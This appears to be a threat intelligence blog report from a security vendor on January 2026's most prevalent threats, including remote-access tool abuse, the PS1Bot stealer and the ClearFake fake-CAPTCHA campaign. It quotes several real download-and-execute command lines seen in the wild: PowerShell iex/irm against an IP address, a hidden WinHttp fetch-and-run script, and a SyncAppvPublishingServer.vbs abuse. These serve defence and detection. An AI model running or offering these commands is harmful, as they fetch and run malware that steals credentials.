Highlights from January

The top two spots of our top 10 most prevalent threat list this month are both remote monitoring and management (RMM) tools: ScreenConnect at number 1, and NetSupport Manager in 2nd.

ScreenConnect is a ConnectWise product that administrators and adversaries alike use to remotely access and manage devices. It can be a challenge for Red Canary to glean insights into what happens before initial execution on an endpoint, but it seems many of the malicious ScreenConnect installations we detected in January 2026 began with phishing. The phishing lures, either directly or via URL redirects, result in users downloading ScreenConnect MSI installers. Sometimes the MSI files are disguised as documents, with names like document_53ff927a.msi; we continue to see party-invitation-style lures as well. If successfully installed, these instances of ScreenConnect then reach out to malicious infrastructure, for example fedralcourt[.]im, and can subsequently lead to hands-on-keyboard abuse by the operators if not remediated.

NetSupport Manager is a legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access. It remains a popular payload for adversaries; in January we saw it delivered via campaigns leveraging T1204.004 User Execution: Malicious Copy and Paste (aka paste and run, ClickFix, FakeCAPTCHA), as well as by threats like Scarlet Goldfinch, Red Canary’s name for an activity cluster that uses compromised web sites to trick users into executing malicious code. Scarlet Goldfinch is tied for third on this month’s top 10 list.

Sharing the tie for third is ClearFake, an activity cluster first identified in 2023 that uses JavaScript injected into compromised websites to deliver malware via drive-by download techniques. We started seeing and tracking ClearFake at Red Canary in 2024, as one of the first threats to leverage paste and run as an initial execution technique. It’s debuting in the top 10 this month because we recently reassessed the way we track it, making it eligible for inclusion in the top 10. We also observed increased ClearFake activity in January 2026. You can read more about ClearFake below.

Also tying for third is PS1Bot, a modular PowerShell-based information stealer that uses the .NET framework to implement additional capabilities. We’ve been tracking this cluster at Red Canary since March 2025; we reassessed and changed our PS1Bot tracking, making it eligible for top 10 inclusion, and we also saw an increase in activity over the last two months. PS1Bot has several known modules—a keylogger, a screen capture module, and an information-stealing module—and applies these by directly accessing Windows APIs using the .NET framework. The information stealer module is capable of collecting potentially sensitive files like:

• files related to passwords
• files that may contain cryptocurrency wallet seed phrases
• information about any MFA applications that may be on the system

PS1Bot initial access often occurs via search engine optimization (SEO) poisoning  and malvertising campaigns that lead users to download a malicious ZIP file. The malicious ZIP archive names typically match the user’s search terms, like guide for planning design and operation of pedestrian facilities.zip and free daily chronicles for seniors pdf.zip. The ZIP archive contains a malicious JavaScript file named FULL DOCUMENT.js that executes via wscript.exe and reaches out to adversary infrastructure, downloading and installing PS1Bot in a randomly named ProgramData subdirectory. Additional indicators of PS1Bot installation include a randomly named two-to-eight-character PowerShell script, and follow-on scriptloads that contain .NET code as PS1Bot executes its modules.

We have observed PS1Bot precede the execution of Rhadamanthys, an information stealer written in C++ that is used to steal credentials, cryptocurrency wallets, and browser data, while also downloading and executing additional payloads.

This month’s top 10 threats

To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.

Here’s how the numbers shook out for January 2026:

⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month

*Denotes a tie

Clearly corrupt: ClearFake

ClearFake is a malicious activity cluster characterized by a complex execution chain between page load and payload delivery. ClearFake operators compromise legitimate websites and inject JavaScript code that will execute upon page load. The JavaScript can point to a variety of services to redirect user traffic and load additional scripts. Over time, ClearFake injects have pointed to the serverless platform Cloudflare Workers, GitHub repositories, and Web3.js libraries used to interact with blockchain networks like Binance Smart Chain—a technique called “etherhiding”—to host and retrieve malicious instructions.

A code snippet from Expel showing the ClearFake etherhiding POST call to bsc-testnet.drpc[.]org

When a user visits a website—typically a WordPress site—compromised by ClearFake, the page initially loads normally before the whole page is taken over by a call to action to prompt user interaction. In 2023 and early 2024, these prompts were typically to update Chrome, but it has since adopted additional prompts. In April 2024, it was seen using ClickFix, aka paste and run, with a web inject that would display a pop-up prompting users to “fix” the display of the compromised website. In late 2025 and early 2026, including January 2026, we’ve seen ClearFake most frequently use the fake CAPTCHA variant of paste and run lures.

To evade detection, the specific script formats used by ClearFake for initial execution after successful prompt interaction have evolved over time. In November and December 2025 we saw initial execution with commands leveraging mshta.exe. More recently, in January 2026, ClearFake abused the legitimate SyncAppvPublishingServer.vbs for initial access, for example:

"C:\WINDOWS\System32\WScript.exe" "C:\WINDOWS\system32\SyncAppvPublishingServer.vbs" "n;&(gal i*x)(&(gcm *stM*) 'cdn.jsdelivr[.]net/gh/grading-chatter-dock73/vigilant-bucket-gui/p1lot')"

Red Canary and other researchers are tracking ongoing use of ClearFake for malware distribution. The most recent examples we have at the time of publication, from February 2026, begin with pasted commands leveraging PowerShell:

• "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -c iex(irm 158.94.209[.]33 -UseBasicParsing)
• "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$w=New-Object -ComObject WinHttp.WinHttpRequest.5.1;$w.Open('GET','https[:]//cdn[.]jsdelivr[.]net/gh/www1day7/msdn/fase32',0);$w.Send();$f=$env:TEMP+'\FVL.ps1';$w.ResponseText>$f;powershell -w h -ep bypass -f $f"

Successful interaction with ClearFake lures has led to the delivery of a variety of stealer payloads, including Amadey, ArechClientC2, and LummaC2.

We continue to recommend training for end users, focusing on identifying, reporting, and avoiding fake browser updates and fake CAPTCHA lures. Detecting execution of paste and run goes a long way toward catching ClearFake before it can download any payloads. Also, ClearFake’s recent use of PowerShell to reach out to remote resources gives us a detection opportunity.

Detection opportunity: PowerShell using invoke-expression and invoke-restmethod to download content at a remote IP address.

This pseudo detection analytic identifies instances of PowerShell using invoke-expression and  invoke-restmethod to download content from a remote IP address. Adversaries like ClearFake use this function to download remotely hosted scripts and payloads for further exploitation of an endpoint. Note that legitimate package management and orchestration utilities like Chocolatey may use this function to update themselves.